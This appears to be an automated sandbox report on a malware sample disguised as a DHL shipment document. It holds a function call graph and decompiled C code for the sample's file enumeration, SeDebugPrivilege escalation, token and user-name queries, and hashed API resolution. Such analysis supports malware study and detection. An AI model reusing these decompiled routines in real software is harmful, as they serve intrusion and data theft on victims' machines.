404b22 6 API calls 9310->9311 9312 4094fe 9311->9312 9313 409554 9312->9313 9314 405b6f 6 API calls 9312->9314 9315 409514 9314->9315 9317 404b22 6 API calls 9315->9317 9322 40954d 9315->9322 9316 402bab 2 API calls 9316->9313 9318 40952d 9317->9318 9319 409408 15 API calls 9318->9319 9324 409544 9318->9324 9321 40953e 9319->9321 9320 402bab 2 API calls 9320->9322 9323 402bab 2 API calls 9321->9323 9322->9316 9323->9324 9324->9320 9333 4058ea 9334 4031e5 4 API calls 9333->9334 9335 4058fd StrStrA 9334->9335 9967 40d4ea 9968 404bee 6 API calls 9967->9968 9969 40d500 9968->9969 9970 40d5a0 9969->9970 9971 404bee 6 API calls 9969->9971 9972 40d529 9971->9972 9973 404bee 6 API calls 9972->9973 9974 40d537 9973->9974 9975 404bee 6 API calls 9974->9975 9976 40d546 9975->9976 9976->9970 9977 405872 4 API calls 9976->9977 9978 40d56d 9977->9978 9979 405872 4 API calls 9978->9979 9980 40d57c 9979->9980 9981 405872 4 API calls 9980->9981 9982 40d58e 9981->9982 9983 405872 4 API calls 9982->9983 9983->9970 9984 40a3ea 9985 40374e 6 API calls 9984->9985 9986 40a403 9985->9986 9987 40a419 9986->9987 9988 4059d8 4 API calls 9986->9988 9989 40a411 9988->9989 9990 402bab 2 API calls 9989->9990 9990->9987 9373 404df3 WSAStartup 9377 4091f6 9378 404b22 6 API calls 9377->9378 9379 40920b 9378->9379 9380 409222 9379->9380 9381 409408 15 API calls 9379->9381 9382 40921c 9381->9382 9383 402bab 2 API calls 9382->9383 9383->9380 10017 4117fe 10018 404c4e 6 API calls 10017->10018 10019 411888 10018->10019 10020 404c4e 6 API calls 10019->10020 10022 411925 10019->10022 10021 4118ab 10020->10021 10021->10022 10036 4119b3 10021->10036 10024 4118c5 10025 4119b3 4 API calls 10024->10025 10026 4118d0 10025->10026 10026->10022 10027 4056bf 2 API calls 10026->10027 10028 4118fd 10027->10028 10029 405872 4 API calls 10028->10029 10030 41190a 10029->10030 10031 405872 4 API calls 10030->10031 10032 411915 10031->10032 10033 413aca 4 API calls 10032->10033 10034 41191f 10033->10034 10035 405695 2 API calls 10034->10035 10035->10022 10037 4119c6 10036->10037 10039 4119bf 10036->10039 10038 4031e5 4 API calls 10037->10038 10038->10039 10039->10024 9387 40e880 9388 41219c 14 API calls 9387->9388 9389 40e88e 9388->9389 9390 41219c 14 API calls 9389->9390 9391 40e89c 9390->9391 10103 40e48a 10104 404bee 6 API calls 10103->10104 10106 40e4d0 10104->10106 10105 40e4f4 10106->10105 10107 405872 4 API calls 10106->10107 10107->10105 9488 410390 9489 404b22 6 API calls 9488->9489 9490 4103a5 9489->9490 9491 410409 9490->9491 9492 405b6f 6 API calls 9490->9492 9496 4103ba 9492->9496 9493 410402 9494 402bab 2 API calls 9493->9494 9494->9491 9495 402bab 2 API calls 9495->9493 9496->9493 9497 403d74 19 API calls 9496->9497 9500 4103fb 9496->9500 9498 4103ee 9497->9498 9499 402bab 2 API calls 9498->9499 9498->9500 9499->9500 9500->9495 10118 40ed96 10119 4040bb 12 API calls 10118->10119 10133 40edb0 10119->10133 10120 40ef90 10121 40ef87 10122 403f9e 5 API calls 10121->10122 10122->10120 10123 405ae9 6 API calls 10123->10133 10124 412269 6 API calls 10124->10133 10125 40ef61 10127 40ef6e 10125->10127 10129 402bab 2 API calls 10125->10129 10126 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10126->10133 10128 40ef7c 10127->10128 10130 402bab 2 API calls 10127->10130 10128->10121 10131 402bab 2 API calls 10128->10131 10129->10127 10130->10128 10131->10121 10132 402bab GetProcessHeap HeapFree 10132->10133 10133->10120 10133->10121 10133->10123 10133->10124 10133->10125 10133->10126 10133->10132 10134 40ef98 10135 404c4e 6 API calls 10134->10135 10136 40efb6 10135->10136 10137 40f02a 10136->10137 10149 40f054 10136->10149 10140 404bee 6 API calls 10141 40efda 10140->10141 10142 404bee 6 API calls 10141->10142 10143 40efe9 10142->10143 10143->10137 10144 405872 4 API calls 10143->10144 10145 40f008 10144->10145 10146 405872 4 API calls 10145->10146 10147 40f01a 10146->10147 10148 405872 4 API calls 10147->10148 10148->10137 10150 40f064 10149->10150 10151 402b7c 2 API calls 10150->10151 10153 40f072 10151->10153 10152 40efca 10152->10140 10153->10152 10155 405ecd 10153->10155 10156 4059b8 4 API calls 10155->10156 10157 405edf 10156->10157 10157->10153 9507 410c98 9508 41219c 14 API calls 9507->9508 9509 410ca8 9508->9509 9510 41219c 14 API calls 9509->9510 9511 410cb5 9510->9511 9512 412093 20 API calls 9511->9512 9513 410cc9 9512->9513 10227 41249c 10228 4056bf 2 API calls 10227->10228 10229 4124aa 10228->10229 10230 4057df 13 API calls 10229->10230 10235 4124ce 10229->10235 10231 4124be 10230->10231 10232 413aca 4 API calls 10231->10232 10233 4124c8 10232->10233 10234 405695 2 API calls 10233->10234 10234->10235 9517 40f49e 9518 40f4b6 13 API calls 9517->9518 9519 40f4a8 9518->9519 9520 40929e 9521 413b28 6 API calls 9520->9521 9522 4092a4 9521->9522 9523 405b6f 6 API calls 9522->9523 9524 4092af 9523->9524 9525 4092c5 9524->9525 9526 409408 15 API calls 9524->9526 9527 4092bf 9526->9527 9528 402bab 2 API calls 9527->9528 9528->9525 10254 407fa4 10255 407fb7 10254->10255 10256 402b7c 2 API calls 10255->10256 10258 407fee 10255->10258 10257 40800d 10256->10257 10257->10258 10259 4037be 4 API calls 10257->10259 10260 40803c 10259->10260 10261 402bab 2 API calls 10260->10261 10261->10258 9565 4090aa 9566 404b22 6 API calls 9565->9566 9567 4090c1 9566->9567 9568 4090d8 9567->9568 9569 409408 15 API calls 9567->9569 9570 404b22 6 API calls 9568->9570 9571 4090d2 9569->9571 9572 4090eb 9570->9572 9573 402bab 2 API calls 9571->9573 9574 408c4d 15 API calls 9572->9574 9577 409104 9572->9577 9573->9568 9575 4090fe 9574->9575 9576 402bab 2 API calls 9575->9576 9576->9577 9584 409cae 9599 404b79 9584->9599 9586 409cc5 9587 409d27 9586->9587 9588 405b6f 6 API calls 9586->9588 9590 409d2f 9586->9590 9589 402bab 2 API calls 9587->9589 9591 409cec 9588->9591 9589->9590 9591->9587 9592 404b79 6 API calls 9591->9592 9593 409d05 9592->9593 9594 409d1e 9593->9594 9595 408c4d 15 API calls 9593->9595 9596 402bab 2 API calls 9594->9596 9597 409d18 9595->9597 9596->9587 9598 402bab 2 API calls 9597->9598 9598->9594 9600 404b22 6 API calls 9599->9600 9601 404b8a 9600->9601 9601->9586 10321 411fb3 10322 405b6f 6 API calls 10321->10322 10324 412013 10322->10324 10323 412075 10324->10323 10339 41206a 10324->10339 10340 411a8d 10324->10340 10326 402bab 2 API calls 10326->10323 10328 4056bf 2 API calls 10329 41203d 10328->10329 10330 405872 4 API calls 10329->10330 10331 41204a 10330->10331 10332 413aca 4 API calls 10331->10332 10333 412054 10332->10333 10334 405695 2 API calls 10333->10334 10335 41205a 10334->10335 10336 413a58 13 API calls 10335->10336 10337 412064 10336->10337 10338 402bab 2 API calls 10337->10338 10338->10339 10339->10326 10341 402b7c 2 API calls 10340->10341 10342 411aa3 10341->10342 10350 411f05 10342->10350 10363 404ada 10342->10363 10345 404ada 4 API calls 10346 411cad 10345->10346 10347 411f0c 10346->10347 10348 411cc0 10346->10348 10349 402bab 2 API calls 10347->10349 10366 405eb6 10348->10366 10349->10350 10350->10328 10350->10339 10352 411d3c 10353 4031e5 4 API calls 10352->10353 10361 411d7b 10353->10361 10354 411ea6 10355 4031e5 4 API calls 10354->10355 10356 411eb5 10355->10356 10357 4031e5 4 API calls 10356->10357 10358 411ed6 10357->10358 10359 405eb6 4 API calls 10358->10359 10359->10350 10360 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10360->10361 10361->10354 10361->10360 10362 405eb6 4 API calls 10361->10362 10362->10361 10364 4031e5 4 API calls 10363->10364 10365 404afd 10364->10365 10365->10345 10367 405998 4 API calls 10366->10367 10368 405ec8 10367->10368 10368->10352 9631 40f6b8 9632 41219c 14 API calls 9631->9632 9633 40f6c7 9632->9633 9634 41219c 14 API calls 9633->9634 9635 40f6d5 9634->9635 9636 41219c 14 API calls 9635->9636 9637 40f6df 9636->9637 9656 40d6bd 9657 4056bf 2 API calls 9656->9657 9658 40d6c9 9657->9658 9669 404cbf 9658->9669 9661 404cbf 8 API calls 9662 40d6f4 9661->9662 9663 404cbf 8 API calls 9662->9663 9664 40d702 9663->9664 9665 413aca 4 API calls 9664->9665 9666 40d711 9665->9666 9667 405695 2 API calls 9666->9667 9668 40d71f 9667->9668 9670 402b7c 2 API calls 9669->9670 9671 404ccd 9670->9671 9672 404ddc 9671->9672 9673 404b8f 5 API calls 9671->9673 9672->9661 9674 404ce4 9673->9674 9675 404dd4 9674->9675 9677 402b7c 2 API calls 9674->9677 9676 402bab 2 API calls 9675->9676 9676->9672 9684 404d04 9677->9684 9678 404dcc 9679 404a39 5 API calls 9678->9679 9679->9675 9680 404dc6 9682 402bab 2 API calls 9680->9682 9681 402b7c 2 API calls 9681->9684 9682->9678 9683 404b8f 5 API calls 9683->9684 9684->9678 9684->9680 9684->9681 9684->9683 9685 402bab GetProcessHeap HeapFree 9684->9685 9686 404a39 5 API calls 9684->9686 9687 405b6f 6 API calls 9684->9687 9688 404cbf 8 API calls 9684->9688 9685->9684 9686->9684 9687->9684 9688->9684 9689 40f0bf 9690 4056bf 2 API calls 9689->9690 9691 40f0c9 9690->9691 9692 40f115 9691->9692 9694 404cbf 8 API calls 9691->9694 9693 41219c 14 API calls 9692->9693 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9692

                    Executed Functions

                    Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 154 403f97-403f9d 152->154 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 166 403e75-403e90 call 4031e5 FindNextFileW 159->166 167 403dde-403de2 159->167 160->150 175 403f03-403f0a 161->175 176 403efa-403f01 161->176 162->152 166->159 179 403e96-403e97 call 403bef 166->179 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 188 403e30-403e4c call 405b6f 172->188 189 403e24-403e2e 172->189 173->166 185 403dfb-403e10 call 405eff 173->185 181 403f12-403f2d call 405b6f 175->181 182 403f0c-403f10 175->182 176->175 180 403f41-403f5c call 4031e5 FindNextFileW 176->180 193 403e9c 179->193 196 403f87-403f88 call 403bef 180->196 197 403f5e-403f61 180->197 181->180 199 403f2f-403f33 181->199 182->180 182->181 185->166 185->172 188->166 203 403e4e-403e6f call 403d74 call 402bab 188->203 189->166 189->188 193->160 207 403f8d 196->207 197->161 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->180 217->154
                    C-Code - Quality: 85%
                    			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                    0x00403d82
                    0x00403d88
                    0x00403d8c
                    0x00403d8d
                    0x00403d90
                    0x00403ea9
                    0x00403ea9
                    0x00403eb9
                    0x00403ebb
                    0x00403ec0
                    0x00403f95
                    0x00403f95
                    0x00000000
                    0x00403f95
                    0x00403ece
                    0x00403edb
                    0x00403edd
                    0x00403ee2
                    0x00403f8e
                    0x00403f8f
                    0x00000000
                    0x00403f94
                    0x00000000
                    0x00403ee8
                    0x00403ef8
                    0x00403f0a
                    0x00403f12
                    0x00403f18
                    0x00403f26
                    0x00403f28
                    0x00403f2d
                    0x00000000
                    0x00000000
                    0x00403f33
                    0x00403f76
                    0x00403f7c
                    0x00000000
                    0x00403f83
                    0x00403f36
                    0x00403f3a
                    0x00000000
                    0x00403f40
                    0x00403f0c
                    0x00403f10
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403f41
                    0x00403f41
                    0x00403f4b
                    0x00403f58
                    0x00403f5c
                    0x00403f88
                    0x00000000
                    0x00403f8d
                    0x00403f60
                    0x00000000
                    0x00403f60
                    0x00403ef8
                    0x00403ee8
                    0x00403da3
                    0x00403da9
                    0x00403ea6
                    0x00403ea8
                    0x00000000
                    0x00403ea8
                    0x00403db7
                    0x00403dc4
                    0x00403dc6
                    0x00403dcb
                    0x00403e9d
                    0x00403e9e
                    0x00403ea4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403dd1
                    0x00403dd1
                    0x00403dd8
                    0x00000000
                    0x00000000
                    0x00403de2
                    0x00403e12
                    0x00403e22
                    0x00403e30
                    0x00403e36
                    0x00403e3f
                    0x00403e44
                    0x00403e47
                    0x00403e4a
                    0x00403e4c
                    0x00000000
                    0x00000000
                    0x00403e63
                    0x00403e65
                    0x00403e6a
                    0x00403e6f
                    0x00403f64
                    0x00403f6a
                    0x00000000
                    0x00403f71
                    0x00000000
                    0x00403e6f
                    0x00403e26
                    0x00403e27
                    0x00403e2e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403e2e
                    0x00403dea
                    0x00403df9
                    0x00000000
                    0x00000000
                    0x00403e01
                    0x00403e10
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403e75
                    0x00403e7f
                    0x00403e8c
                    0x00403e8e
                    0x00403e97
                    0x00000000

                    APIs
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID: %s\%s$%s\*$Program Files$Windows
                    • API String ID: 1690352074-2009209621
                    • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                    • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                    0x00406512
                    0x00406514
                    0x00406522
                    0x00406524
                    0x00406530
                    0x00406534
                    0x0040653f
                    0x0040654e
                    0x00406552
                    0x0040655a
                    0x0040655f
                    0x0040656d
                    0x00406570
                    0x00406573
                    0x0040657a
                    0x00406589
                    0x0040658d
                    0x00406590
                    0x00406594
                    0x00000000
                    0x0040659a
                    0x004065a1

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID: SeDebugPrivilege
                    • API String ID: 3615134276-2896544425
                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                    0x00402b8c
                    0x00402b92
                    0x00402b96
                    0x00402b9e
                    0x00402ba3
                    0x00402baa

                    APIs
                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcess
                    • String ID:
                    • API String ID: 1357844191-0
                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                    0x00406077
                    0x00406082
                    0x00406085

                    APIs
                    • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                    • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                    • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                    • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                    Download Yara Rule
                    APIs
                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062df call 4031e5 265->273 266->257 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                    C-Code - Quality: 75%
                    			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
